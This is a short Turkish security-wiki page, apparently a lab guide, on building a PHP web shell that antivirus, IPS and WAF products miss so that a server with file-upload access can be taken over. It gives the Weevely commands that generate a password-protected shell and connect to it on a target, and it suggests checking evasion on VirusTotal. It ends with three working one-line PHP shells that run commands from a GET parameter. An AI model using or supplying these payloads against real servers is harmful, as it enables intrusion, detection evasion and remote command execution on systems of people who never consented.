Antivirüsler Tarafından Yakalanmayan PHP Shell Oluşturma

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

Dosya yükleme yetkisinin bulunduğu durumlarda, sunucuyu ele geçirmek için Antivirüs/IPS/Waf tarafından tanınmayan PHP shell oluşturmak.

Lab Senaryosu:

PHP destekli bir web sunucusu. Örnekte Centos 6 üzerine kurulu Apache 2.2 kullanılmıştır.

Araç:

  • Weevely


Adımlar:

  • "weevely generate.php pass123 sh.php" komutuyla, parolası pass123 olan ve dosya adı sh.php olan bir PHP shell oluşturulur. Oluşturulan sh.php dosyasının, antivirüsler tarafından tanınmadığı, www.virustotal.com gibi toplu tarama yapan adreslerden doğrulanabilir. Oluşturulan sh.php dosyası, sunucuya yüklenir.
  • "weevely http://hedefadres/sh.php pass123" komutu kullanılarak yüklenen PHP shell ile şifreli bir bağlantı üzerinden interaktif shell elde edilir. İlk olarak ":system.info" all komutu ile hedef sistem hakkında detaylı bilgi toplamak faydalı olacaktır. Devamında :help ile kullanılabilir modüller listelenip kullanılabilir.

PHPshellolusturma1.png

Ayrıca, web sunucusu kullanıcısının yetkileri çerçevesinde, standart konsol komutları da kullanılabilir.

  • Eğer, weevely ile başarılı olunamazsa veya shell’i log dosyasına yazmak gibi bazı özel durumlarda, tek satırlık PHP shell’ler de kullanılabilir.
  • <?php passthru($_GET[‘cmd’]); ?>
  • <?php system($_GET[‘cmd’]); ?>
  • <?php echo shell_exec($_GET[‘cmd’]); ?>

Kaynak:[değiştir]